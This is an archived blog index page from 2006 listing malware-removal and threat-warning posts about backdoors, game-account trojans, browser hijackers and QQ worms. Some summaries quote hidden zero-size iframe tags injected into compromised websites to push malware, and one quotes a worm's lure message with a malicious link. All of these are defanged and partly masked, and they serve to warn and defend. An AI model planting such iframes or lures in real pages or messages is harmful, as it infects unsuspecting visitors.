Purpleendurer@CSDN

编程……任是无情也动人~

用户操作
[即时聊天] [发私信] [加为好友]
黄志斌ID:Purpleendurer
790034次访问,排名47,好友12人,关注者144人。
剑胆琴心泣鬼神 侠骨柔肠更动人……编程~
关注电脑&网络安全~
Purpleendurer的文章
原创 790 篇
翻译 56 篇
转载 29 篇
评论 247 篇
Purpleendurer的公告
用MASM32编写pe_xscan中……
最近评论
Purpleendurer:to Andox:

由于病毒替换或改名了不少系统文件,因此杀毒后系统的某些功能会失效~

要恢复这些被替换或改名的系统文件,需要不少时间

一键还原或重装系统的工作量会小一些
Purpleendurer:to Andox:

由于病毒替换或改名了不少系统文件,因此杀毒后系统的某些功能会失效~

要恢复这些被替换或改名的系统文件,需要不少时间

一键还原或重装系统的工作量会小一些
Andox:请问博主
这病毒有解决的方法吗
Andox:有解决的方法吗
robbled:好难懂,好高深啊。
文章分类
收藏
相册
autoXrun
FileInfo
virus
安全资源
聚宝册
卡卡狮
我的作品
My Blog
purpleendurer@$inaBlog(RSS)
purpleendurer@bokee
purpleendurer@yesky
友情blog
endurer@$inablog
endurer@bokee
endurer@csdn
endurer@nnsky
Google开源代码搜索
存档
软件项目交易
订阅我的博客
XML聚合  FeedSky
订阅到鲜果
订阅到Google
订阅到抓虾
订阅到BlogLines
订阅到Yahoo
订阅到GouGou
订阅到飞鸽
订阅到Rojo
订阅到newsgator
订阅到netvibes
2006年08月

原创 遭遇灰鸽子2006、魔兽盗号木马等

有一位网友的电脑,双击桌面图标,显示出来的却是图标的属性窗口。瑞星实时监控也无法打开。阅读全文>

发表于 @ 2006年08月31日 13:50:00|评论(loading...)|编辑

原创 [09-05] 解决www.71791.com 浏览器劫持问题

有网友反应,电脑不定期弹出广告窗口。阅读全文>

发表于 @ 2006年08月30日 14:47:00|评论(loading...)|编辑

原创 下载baidu等流氓软件/插件的SmartNet.exe

SmartNet.exe 采用 Microsoft Visual C++ v7.0 开发,会阅读全文>

发表于 @ 2006年08月30日 00:40:00|评论(loading...)|编辑

原创 又是流氓软件/插件惹的祸

有网友反应,他的电脑莫莫名其妙地出现了好多流氓软件/插件,昨天卸了,今天又有了,还弄得电脑上不了网。阅读全文>

发表于 @ 2006年08月28日 23:33:00|评论(loading...)|编辑

原创 干掉了一个灰鸽子/Backdoor.Gpigeon.uql变种

一位网友的电脑,这两天瑞星开机扫描总报告发现 Backdoor.Gpigeon.uql。阅读全文>

发表于 @ 2006年08月28日 14:24:00|评论(loading...)|编辑

原创 顽固的灰鸽子 Backdoor.Gpigeon.uql 变种 Backdoor.Win32.Hupigon.cda

一位网友的电脑,这两天瑞星开机扫描总报告发现Backdoor.Gpigeon.uql。阅读全文>

发表于 @ 2006年08月26日 16:38:00|评论(loading...)|编辑

翻译 [译] Windows rootkits 101

当管理员们和安全专家们听到“rootkit”这个词时,其中一些人首先想到的是基于UNIX的系统,但实际情况是Windows(系统中的)rootkits存在着,你要能检测它们。从Mike Mullins的本期安全解决方案中获取细节罢。阅读全文>

发表于 @ 2006年08月24日 23:18:00|评论(loading...)|编辑

原创 阻击 瑞星 和 雅虎助手 的 SVOHOST.exe(第2版)

有网友反映,他电脑上的瑞星实时监控小伞突然消失,手动启动实时监控也不显示;启动瑞星杀毒程序时窗口无显示,只显示瑞星杀毒助手;瑞星文件的属性窗口一显示就自动关闭。阅读全文>

发表于 @ 2006年08月23日 21:52:00|评论(loading...)|编辑

原创 解决浏览器被 http://www.haohao1.com 劫持问题(第2版)

有网友的电脑中的IE首页被强制设置为 hxxp://www.haohao1.com。 使用HijackThis(可以到 http://endurer.ys168.com 下载)扫描log,发现一个可疑项: 阅读全文>

发表于 @ 2006年08月23日 20:55:00|评论(loading...)|编辑

原创 又一个下载恶意文件的政府网站

首页有3处地方被加入:<iframe height=0 width=0 src="hxxp://***object.cnic**b.com/15"></iframe> 阅读全文>

发表于 @ 2006年08月22日 23:04:00|评论(loading...)|编辑

原创 木马windowout.exe

windowout.exe (133,126 字节)是 木马MicrosoftSQL.exe(Trojan.DL.VB.cap/Win32.VB.ajb) 下载的文件之一,它会 释放/下载文件: 阅读全文>

发表于 @ 2006年08月22日 22:41:00|评论(loading...)|编辑

原创 两个下载恶意程序文件的政府网站换花样了

今天又看了看 两个会自动下载恶意程序文件的政府网站 一文中的两个网站,发现换了花样。阅读全文>

发表于 @ 2006年08月22日 12:31:00|评论(loading...)|编辑

原创 roogoo发布的quartz32.dll让浏览器不断弹出广告窗口

有网友反映:他的电脑,不管用什么浏览器上网,总是会弹出奇怪的网页,什么都有。而且不是开网页时弹网页,是开了浏览器就弹,过一会弹一个,有时开个空白页都弹。阅读全文>

发表于 @ 2006年08月22日 12:22:00|评论(loading...)|编辑

原创 一个下载木马的网站

网站首页插入如下代码:<iframe src="hxxp://www.ac***66.cn/8***8/index.htm" width="0" height="0" frameborder="0"></iframe> 阅读全文>

发表于 @ 2006年08月21日 13:43:00|评论(loading...)|编辑

原创 清除了灰鸽子新变种、几个广告程序

Backdoor.Gpigeon.uql 清除成功 2006-08-19 13:58 IEXPLORE.EXE>>C:\Program Files\Internet Explorer\IEXPLORE.EXE本机阅读全文>

发表于 @ 2006年08月20日 22:16:00|评论(loading...)|编辑

原创 两个会自动下载恶意程序文件的政府网站

打开这两个网站时,Kaspersky 提示发现 Exploit.JS.ADODB.stream.e阅读全文>

发表于 @ 2006年08月18日 23:42:00|评论(loading...)|编辑

原创 木马MicrosoftSQL.exe(Trojan-Downloader.Win32.VB.ajb/Trojan.DL.VB.cap)

有网友反映,他所在的公司的局域网上的所有电脑中的共享文档都会生成MicrosoftSQL.exe,用瑞星未查杀,删除又会生成。并把MicrosoftSQL.exe发给我。阅读全文>

发表于 @ 2006年08月18日 14:18:00|评论(loading...)|编辑

原创 解决灰鸽子变种、Rootkit.Win32.Vanti、Win32.Delf、Win32.Small等

一位网友的电脑,这两天瑞星开机扫描总报告发现Backdoor.Gpigeon.uql。阅读全文>

发表于 @ 2006年08月17日 21:35:00|评论(loading...)|编辑

原创 双击桌面上的IE图标却提示找不到文件iexplore.com的解决办法

一位网友的电脑,查杀病毒后,双击桌面上的IE图标却弹出对话框,提示找不到文件iexplore.com。阅读全文>

发表于 @ 2006年08月16日 21:57:00|评论(loading...)|编辑

原创 遭遇RootKit.Vanti.kn、Trojan.PSW.JHOnline.eqo、Trojan.PSW.LMir.ktn等

有一位网友电脑这几天瑞星总报告发现RootKit.Vanti.kn、Trojan.PSW.JHOnline.eqo、Trojan.PSW.LMir.ktn等病毒,请偶帮忙看看。 阅读全文>

发表于 @ 2006年08月16日 12:06:00|评论(loading...)|编辑

原创 干掉了一只灰鸽子/Backdoor.Gpigeon.uql新变种

一位网友的电脑,这两天瑞星开机扫描总报告发现Backdoor.Gpigeon.uql。阅读全文>

发表于 @ 2006年08月13日 23:26:00|评论(loading...)|编辑

原创 再战Trojan.PSW.Lmir.kuo、Trojan.PSW.Misc.kcc等网游盗号木马(第2版)

今早一上网,就有网友求助。他电脑屏幕右下角的瑞星实时监控小伞图标不见了,手动启动也不行。阅读全文>

发表于 @ 2006年08月12日 11:53:00|评论(loading...)|编辑

原创 又干掉了一只灰鸽子/Backdoor.Gpigeon.uql新变种

一位网友的电脑,这几天瑞星开机扫描总报告发现Backdoor.Gpigeon.uql。阅读全文>

发表于 @ 2006年08月11日 21:11:00|评论(loading...)|编辑

原创 遭遇木马Trojan.PSW.ZhengTu.dm、Trojan.PSW.LMir.atb

刚才一位网友的电脑开机时,瑞星开机扫描发现病毒:Trojan.PSW.ZhengTu.dm、Trojan.PSW.LMir.atb,接着瑞星监控小伞变红,无法开启所有监控。请我帮忙看看。 阅读全文>

发表于 @ 2006年08月10日 23:38:00|评论(loading...)|编辑

原创 收到QQ尾巴 Worm.QQ.TopFox.bo 送来的“我的近照11.zip”

一位网友的电脑中了QQ尾巴,自动发送文件“我的近照11.zip”。阅读全文>

发表于 @ 2006年08月08日 23:04:00|评论(loading...)|编辑

原创 小心通过QQ尾巴中的网址(Q-Zone.****qq.C0M)传播的Worm.Win32.Viking.r

一个网友的电脑中了QQ尾巴,打开QQ好友的对话框就会自动发出如下信息: 麻烦帮我朋友投个票啦!她正在竞选QQ小姐,参选Q-Zone空间上有她近照,点击为她增加人气,先谢谢喽…… hxxp://Q-Zone.****qq.C0M.%62%30%76%2E%63%6E/cgi-bin/Photo=No.****947561 阅读全文>

发表于 @ 2006年08月02日 01:30:00|评论(loading...)|编辑

原创 [08-01] 再斩灰鸽子Backdoor.Gpigeon.uql新变种(第3版)

有位网友的说,他电脑上的瑞星开机自动扫描总报告: Backdoor.Gpigeon.uql 清除成功 2006-07-28 16:01 IEXPLORE.EXE>>C:\Program Files\Internet Explorer\IEXPLORE.EXE本机阅读全文>

发表于 @ 2006年08月01日 15:24:00|评论(loading...)|编辑

Csdn Blog version 3.1a
Copyright © Purpleendurer